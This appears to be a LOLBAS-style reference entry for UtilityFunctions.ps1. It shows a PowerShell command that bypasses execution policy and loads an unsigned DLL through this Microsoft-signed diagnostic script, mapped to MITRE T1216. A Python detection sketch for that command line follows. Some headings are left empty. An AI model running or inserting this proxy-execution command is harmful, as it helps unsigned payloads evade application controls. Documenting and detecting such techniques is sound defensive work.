.. /UtilityFunctions.ps1

PowerShell Diagnostic Script


Paths:

Resources:
Acknowledgements:

Detection:

Execute

Proxy execute Managed DLL with PowerShell
powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"
Use case: Execute proxied payload with Microsoft signed binary
Privileges required: User
OS: Windows 10 21H1 (likely other versions as well), Windows 11
MITRE ATT&CK®: T1216
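
Detection sketch for the command line above, as an added example that is not part of the original entry or of the LOLBAS project: it scans process-creation command lines for an import of UtilityFunctions.ps1 followed by a RegSnapin call and resolves the DLL argument against the Set-Location path to show where the assembly really lives. The sample events, the function name analyze and the treatment of C:\Windows\diagnostics as the expected location are assumptions.

```python
import ntpath
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    # The command line documented in this entry.
    r'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; '
    r'import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"',
    # Constructed: the script is imported but RegSnapin is never called.
    r'powershell.exe -command "import-module C:\Windows\diagnostics\system\networking\UtilityFunctions.ps1"',
    # Constructed: unrelated PowerShell activity.
    r'powershell.exe -NoProfile -Command "Get-Process"',
]

# Assumption: a DLL under this directory is the expected case; anything else is escalated.
DIAG_ROOT = "c:\\windows\\diagnostics\\"
SETLOC_RE = re.compile(r"\b(?:set-location|sl|cd|chdir)\s+(?:-path\s+)?[\"']?([^;\"']+)", re.I)
REGSNAPIN_RE = re.compile(r"\bregsnapin\s+[\"']?([^;\"']+)", re.I)


def analyze(cmdline):
    """Return a finding dict when the command line imports UtilityFunctions.ps1
    and calls RegSnapin, otherwise None."""
    if "utilityfunctions.ps1" not in cmdline.lower():
        return None
    snapin = REGSNAPIN_RE.search(cmdline)
    if not snapin:
        return None
    cwd = SETLOC_RE.search(cmdline)
    base = cwd.group(1).strip() if cwd else ""
    # Collapse the "..\" hops so the alert shows the real DLL location.
    # With no Set-Location the path stays relative and is reported as outside.
    resolved = ntpath.normpath(ntpath.join(base, snapin.group(1).strip())).lower()
    return {"dll": resolved, "outside_diagnostics": not resolved.startswith(DIAG_ROOT)}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        finding = analyze(event)
        if finding:
            print("ALERT", finding)
```
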